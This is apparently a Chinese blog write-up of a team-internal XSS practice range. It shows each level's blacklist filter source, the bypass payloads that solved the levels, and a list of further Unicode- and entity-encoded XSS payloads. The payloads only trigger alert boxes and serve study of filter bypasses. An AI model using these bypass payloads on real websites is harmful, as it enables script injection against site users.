

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="前情提要老大今天把写的xss靶场发出来了，去试试 先要了一个内测版本  欧克，拿到靶场，体验一把 第一关： 首先看看源代码 挺标准的一个注入没有任何过滤，直接插一个payload 1&lt;img src&#x3D;x onerror&#x3D;&quot;alert(&#x2F;xss&#x2F;)&quot;&gt;   来到第二关： 源码123456789101112&#x2F;&#x2F; 对获取到的 URL 做一次过滤plugPreviewUrl">
<meta property="og:type" content="article">
<meta property="og:title" content="xss打靶(团队内部靶场)">
<meta property="og:url" content="http://example.com/2025/03/08/xss%E6%89%93%E9%9D%B6-%E5%9B%A2%E9%98%9F%E5%86%85%E9%83%A8%E9%9D%B6%E5%9C%BA/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="前情提要老大今天把写的xss靶场发出来了，去试试 先要了一个内测版本  欧克，拿到靶场，体验一把 第一关： 首先看看源代码 挺标准的一个注入没有任何过滤，直接插一个payload 1&lt;img src&#x3D;x onerror&#x3D;&quot;alert(&#x2F;xss&#x2F;)&quot;&gt;   来到第二关： 源码123456789101112&#x2F;&#x2F; 对获取到的 URL 做一次过滤plugPreviewUrl">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741338582250-36a2e700-0990-4ca2-abff-b7e14bf5d833.png?x-oss-process=image/format,webp">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741338741578-db6d41d9-dccd-451f-8d64-c878c088ae05.png?x-oss-process=image/format,webp">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741338846516-12594ae0-0e84-4007-9fc0-dd18b79b6ced.png?x-oss-process=image/format,webp">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741339021868-8c11cc25-53e9-458e-8611-dcdcc9d6c7f9.png?x-oss-process=image/format,webp">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741339092161-f699374f-252e-40ad-9dea-7ce150b260a1.png?x-oss-process=image/format,webp">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741339949576-d33e864b-7185-4e08-810c-e0dce628e5fb.png?x-oss-process=image/format,webp">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741340214839-7ad4f0a4-0a3b-4aaa-9d7b-c35adfdda2d2.png?x-oss-process=image/format,webp">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741340369760-022e12f5-847c-49a9-8df7-13bdb57f9039.png?x-oss-process=image/format,webp">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741340607316-5391b3d1-9bb8-4592-8c43-e823fd1f2283.png?x-oss-process=image/format,webp">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741341381233-bfaaff7c-73fc-4f81-8078-178a9bcc6c5b.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741341808023-27d54ad2-494f-4a0e-b164-38a3c2e43c57.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/jpeg/52636441/1741355814140-c4be443f-8b55-4361-a015-bb86013c78f6.jpeg">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741356230424-26def6b9-7d02-4cd2-8242-c78d87c1df9a.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741357599928-38d3e4a1-f561-4890-86f7-1a55dd3fe90b.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741357737118-e0c9ef2d-4dfd-4305-be6e-c55eed4556fe.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741358237032-d039103f-27b5-4366-bcc4-e064f9680eba.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741358241881-3d94a772-074b-429f-b02e-f37b4b7a3eda.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741358551524-18f169a2-e2c4-4224-b25c-a7b514f3a9ad.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741359195467-b74f5509-1cd8-494b-820c-0a096efb405c.png">
<meta property="article:published_time" content="2025-03-08T14:42:15.000Z">
<meta property="article:modified_time" content="2025-03-08T14:57:29.579Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="网络安全(打靶)">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741338582250-36a2e700-0990-4ca2-abff-b7e14bf5d833.png?x-oss-process=image/format,webp">
  
  
  
  <title>xss打靶(团队内部靶场) - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>yawataa</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="xss打靶(团队内部靶场)"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-03-08 22:42" pubdate>
          March 8, 2025 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.4k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          29 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">xss打靶(团队内部靶场)</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="前情提要"><a href="#前情提要" class="headerlink" title="前情提要"></a>前情提要</h1><p>老大今天把写的xss靶场发出来了，去试试</p>
<p>先要了一个内测版本</p>
<p><img src="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741338582250-36a2e700-0990-4ca2-abff-b7e14bf5d833.png?x-oss-process=image/format,webp" srcset="/img/loading.gif" lazyload alt="拿靶场.png"></p>
<p>欧克，拿到靶场，体验一把</p>
<h1 id="第一关："><a href="#第一关：" class="headerlink" title="第一关："></a>第一关：</h1><p><img src="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741338741578-db6d41d9-dccd-451f-8d64-c878c088ae05.png?x-oss-process=image/format,webp" srcset="/img/loading.gif" lazyload alt="第一关.png"></p>
<h2 id="首先看看源代码"><a href="#首先看看源代码" class="headerlink" title="首先看看源代码"></a>首先看看源代码</h2><p><img src="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741338846516-12594ae0-0e84-4007-9fc0-dd18b79b6ced.png?x-oss-process=image/format,webp" srcset="/img/loading.gif" lazyload alt="第一关源码.png"></p>
<p>挺标准的一个注入没有任何过滤，直接插一个payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">&lt;img src=x onerror=&quot;alert(/xss/)&quot;&gt;<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741339021868-8c11cc25-53e9-458e-8611-dcdcc9d6c7f9.png?x-oss-process=image/format,webp" srcset="/img/loading.gif" lazyload alt="第一关弹窗.png"></p>
<h1 id="来到第二关："><a href="#来到第二关：" class="headerlink" title="来到第二关："></a>来到第二关：</h1><p><img src="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741339092161-f699374f-252e-40ad-9dea-7ce150b260a1.png?x-oss-process=image/format,webp" srcset="/img/loading.gif" lazyload alt="第二关开始.png"></p>
<h2 id="源码"><a href="#源码" class="headerlink" title="源码"></a>源码</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs plain">// 对获取到的 URL 做一次过滤<br>plugPreviewUrl = basicXSSFilter(plugPreviewUrl);<br><br>// 如果过滤后为空或不包含 &#x27;://&#x27;<br>if (!plugPreviewUrl || !plugPreviewUrl.includes(&#x27;://&#x27;)) &#123;<br>    document.write(&#x27;&lt;p class=&quot;error&quot;&gt;插件失效&lt;/p&gt;&#x27;);<br>&#125; else &#123;<br>    // 拼接 &#x27;?plug_env=1&#x27; 到末尾<br>    const fullUrl = `$&#123;plugPreviewUrl&#125;?plug_env=1`;<br>    document.write(`&lt;p&gt;即将加载插件：&lt;code&gt;$&#123;fullUrl&#125;&lt;/code&gt;&lt;/p&gt;`);<br>    document.write(`&lt;iframe src=&quot;$&#123;fullUrl&#125;&quot; width=&quot;600&quot; height=&quot;400&quot;&gt;&lt;/iframe&gt;`);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>看起来xss漏洞出现在iframe 标签处</p>
<p>看看过滤条件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs plain">// 简单的关键字过滤函数（仅示范用，黑名单过滤并不安全！）<br>function basicXSSFilter(url) &#123;<br>    if (!url) return &#x27;&#x27;;<br>    // 转小写，便于匹配关键字<br>    const lowerURL = url.toLowerCase();<br>    // 常见的 XSS 关键字或协议<br>    const blackList = [<br>         &#x27;data:&#x27;, &#x27;vbscript:&#x27;,<br>        &#x27;&lt;script&#x27;, &#x27;&lt;/script&#x27;, &#x27;onload=&#x27;, &#x27;onerror=&#x27;,<br>        &#x27;alert(&#x27;, &#x27;prompt(&#x27;, &#x27;confirm(&#x27;,&#x27;&lt;&#x27;<br>    ];<br>    // 如果检测到黑名单中的任何一个，就返回空<br>    for (const keyword of blackList) &#123;<br>        if (lowerURL.includes(keyword)) &#123;<br>            return &#x27;&#x27;;<br>        &#125;<br>    &#125;<br>    // 返回过滤后的原地址<br>    return url;<br>&#125;<br><br>// 对获取到的 URL 做一次过滤<br>plugPreviewUrl = basicXSSFilter(plugPreviewUrl);<br><br>// 如果过滤后为空或不包含 &#x27;://&#x27;<br>if (!plugPreviewUrl || !plugPreviewUrl.includes(&#x27;://&#x27;)) &#123;<br>    document.write(&#x27;&lt;p class=&quot;error&quot;&gt;插件失效&lt;/p&gt;&#x27;);<br></code></pre></td></tr></table></figure>

<h2 id="分析："><a href="#分析：" class="headerlink" title="分析："></a>分析：</h2><p>过滤了常见的一些函数，但是很容易注意到没有过滤 \javascript:,过滤了 alert(,这个圆括号我们可以用 &#96; (反引号来代替)，还有注意到检测了一下:&#x2F;&#x2F;，如果过滤后的返回没有包含：&#x2F;&#x2F;也会报错，不会走到、&lt;iframe&gt;标签下。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">?plug_url=javascript:alert`1`&quot;&gt;://<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741339949576-d33e864b-7185-4e08-810c-e0dce628e5fb.png?x-oss-process=image/format,webp" srcset="/img/loading.gif" lazyload alt="第二关弹窗.png"></p>
<p>当然关于alert()这个的处理还有一种方法，就是利用Unicode编码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">javascript:\u0061\u006c\u0065\u0072\u0074(1)&quot;&gt;://<br></code></pre></td></tr></table></figure>

<p><strong>Unicode 编码时，只能对有效的标识符进行编码，否则非标识符解码后不能解析执行。例如 javascript:alert(1) ，进行 Unicode 编码时，只能对 alert 和 “1” 进行编码，括号编码后会被当成文本字符，不能执行。</strong></p>
<p><img src="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741340214839-7ad4f0a4-0a3b-4aaa-9d7b-c35adfdda2d2.png?x-oss-process=image/format,webp" srcset="/img/loading.gif" lazyload alt="第二关弹窗2.png"></p>
<h1 id="开摆"><a href="#开摆" class="headerlink" title="开摆"></a>开摆</h1><p>然后第三关死活做不出来，当时我就在怀疑自己了，磨蹭了一两个小时吧，我就开摆睡觉去了休息一下大脑。</p>
<p>后来看了群里面消息从知道内测版本有点问题，差点干碎我的黑客梦。起床第三关</p>
<p><img src="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741340369760-022e12f5-847c-49a9-8df7-13bdb57f9039.png?x-oss-process=image/format,webp" srcset="/img/loading.gif" lazyload alt="第三关.png"></p>
<h1 id="第三关："><a href="#第三关：" class="headerlink" title="第三关："></a>第三关：</h1><p><img src="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741340607316-5391b3d1-9bb8-4592-8c43-e823fd1f2283.png?x-oss-process=image/format,webp" srcset="/img/loading.gif" lazyload alt="第三关开始.png"></p>
<h2 id="源代码"><a href="#源代码" class="headerlink" title="源代码"></a>源代码</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><code class="hljs plain">&lt;script&gt;<br>       // 简易的黑名单数组（仅示例，黑名单过滤并不安全，仍可能被绕过）<br>       const blackList = [<br>           &#x27;script&#x27;, &#x27;onload=&#x27;, &#x27;onerror=&#x27;, &#x27;alert&#x27;, &#x27;prompt&#x27;,<br>           &#x27;data:&#x27;, &#x27;vbscript:&#x27;, &#x27;javascript:&#x27;, &#x27;eval&#x27;, &#x27;&quot;javascript&quot;&#x27;,&#x27;(&#x27;,&#x27;href&#x27;,&#x27;src&#x27;<br>       ];<br><br>       /*<br>        * extendedXSSFilter:<br>        *  - 遍历 blackList 中的关键字<br>        *  - 将所有命中的关键字在输入中移除<br>        *  - 并记录哪些关键字被移除，以及移除了多少次<br>        */<br>       function extendedXSSFilter(str) &#123;<br>           if (!str) &#123;<br>               return &#123;<br>                   safe: &#x27;&#x27;,<br>                   removedItems: []<br>               &#125;;<br>           &#125;<br><br>           let safe = str;<br>           let lower = safe.toLowerCase();<br>           const removedItems = []; // 用于记录被移除的关键字和移除次数<br><br>           // 遍历每个关键字，找到了就去掉<br>           blackList.forEach(keyword =&gt; &#123;<br>               let count = 0;<br>               // 循环查找并移除 keyword<br>               while (lower.includes(keyword)) &#123;<br>                   count++;<br>                   const idx = lower.indexOf(keyword);<br>                   // 移除关键词部分<br>                   safe = safe.substring(0, idx) + safe.substring(idx + keyword.length);<br>                   lower = safe.toLowerCase();<br>               &#125;<br>               // 如果此关键字被移除过<br>               if (count &gt; 0) &#123;<br>                   removedItems.push(`$&#123;keyword&#125; ×$&#123;count&#125;`);<br>               &#125;<br>           &#125;);<br><br>           return &#123;<br>               safe,<br>               removedItems<br>           &#125;;<br>       &#125;<br><br>       function submitInput() &#123;<br>           const userValue = document.getElementById(&#x27;userInput&#x27;).value;<br>           // 过滤并收集被移除的关键字<br>           const &#123; safe, removedItems &#125; = extendedXSSFilter(userValue);<br><br>           // 将过滤后的值输出到结果区域<br>           document.getElementById(&#x27;output&#x27;).innerHTML = safe;<br><br>           // 将被移除的关键字在页面上显示<br>           const removedBox = document.getElementById(&#x27;removed&#x27;);<br>           if (removedItems.length === 0) &#123;<br>               removedBox.textContent = &#x27;无&#x27;;<br>           &#125; else &#123;<br>               // 拼接移除信息<br>               removedBox.textContent = removedItems.join(&#x27;, &#x27;);<br>           &#125;<br><br>           // 如果你还想要在控制台查看详细信息<br>           console.log(&#x27;过滤后的结果:&#x27;, safe);<br>           console.log(&#x27;移除的关键字:&#x27;, removedItems);<br><br>           // 最后 return 结果, 以便日后使用<br>           return safe;<br></code></pre></td></tr></table></figure>

<h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><p>黑名单增加的更多了，然后增加了循环遍历过滤关键字，但是还是黑名单，但是href和src过滤了很伤，先找找可以造成xss的标签和属性，并且不在这个黑名单里的</p>
<p>最后我在翻一些常见payload时注意到了这个payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">&lt;input onfocus=alert(1) autofocus&gt;<br></code></pre></td></tr></table></figure>

<p>标签和属性都没有过滤，里面过滤的只有一个alert(</p>
<p>而这个alert我们可以通过Unicode编码进行绕过，圆括号就用反引号</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">&lt;input onfocus=\u0061\u006c\u0065\u0072\u0074`1` autofocus&gt;<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741341381233-bfaaff7c-73fc-4f81-8078-178a9bcc6c5b.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="https://cdn.nlark.com/yuque/0/2025/png/52636441/1741341808023-27d54ad2-494f-4a0e-b164-38a3c2e43c57.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h3 id=""><a href="#" class="headerlink" title=""></a></h3><h1 id="总结Unicode编码："><a href="#总结Unicode编码：" class="headerlink" title="总结Unicode编码："></a>总结Unicode编码：</h1><p>当js解释器在标识符名称(例如函数名，属性名等等)中遇到unicode编码会进行解码，并使其标志符照常生效。而在字符串中遇到unicode编码时会进行解码只会被当作字符串。</p>
<p>然后以下属性可以被编码（支持HTML, Octal, Decimal,Hexadecimal, and Unicode）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs plain">href=<br>action=<br>formaction=<br>location=<br>on*=<br>name=<br>background=<br>poster=<br>src=<br>code=<br>data= //只支持base64<br><br>部分属性在旧版浏览器使用，新版浏览器就不适用了<br></code></pre></td></tr></table></figure>

<p><strong>具体关于编码的情况可以看看这个师傅的文章</strong>:<a target="_blank" rel="noopener" href="https://saucer-man.com/information_security/103.html">https://saucer-man.com/information_security/103.html</a></p>
<h2 id="其他payload-可编码的"><a href="#其他payload-可编码的" class="headerlink" title="其他payload(可编码的)"></a>其他payload(可编码的)</h2><p>我再补充几个编码绕过的情况吧(并不是绕这个靶场)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs plain">payload1:<br>&lt;div onmouseover=\u0061\u006c\u0065\u0072\u0074`1`&gt;DIV&lt;/div&gt;<br><br>payload2:<br>&lt;a href=javascript:\u0061\u006c\u0065\u0072\u0074`1`&gt;点击&lt;/a&gt;<br><br>payload3:<br>&lt;object data=&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==&quot;&gt;&lt;/object&gt;（注意这个格式，上传base64格式的图片也可以这样尝试造成xss）<br><br>payload4<br>&lt;form action=&quot;javascript:\u0061\u006c\u0065\u0072\u0074`XSS`&quot;&gt;<br>    &lt;input type=&quot;submit&quot; value=&quot;Submit&quot;&gt;<br>  &lt;/form&gt; //可以进行html编码<br><br>payload5:<br>&lt;script&gt;<br>    window.location = &quot;javascript:\u0061\u006c\u0065\u0072\u0074(&#x27;XSS&#x27;)&quot;;<br>    &lt;/script&gt; //这个Javascript不能html实体化编码<br><br>payload6:<br>&lt;img src=x onerror=\u0061\u006c\u0065\u0072\u0074`1`&gt;<br><br>payload7:<br>&lt;body onload=\u0061\u006c\u0065\u0072\u0074`1`&gt;<br><br>payload8:<br>&lt;iframe src=&quot;javascript:\u0061\u006c\u0065\u0072\u0074`1`&quot;&gt;&lt;/iframe&gt; //javascript 不能实体化编码<br></code></pre></td></tr></table></figure>

<p>当然这里就有人要问了，还有javascript怎么办？？部分javascript可以利用html实体化编码进行编码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">&lt;a href=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;:\u0061\u006c\u0065\u0072\u0074`1`&gt;点击&lt;/a&gt;<br></code></pre></td></tr></table></figure>

<p>这样处理就好了</p>
<p>当然我们根据浏览器的解析顺序：HTML解码 –&gt;URL解码 –&gt;JS解码</p>
<p>可以先js编码（unicode编码）-&gt;url编码-&gt;html编码 这样终极大招</p>
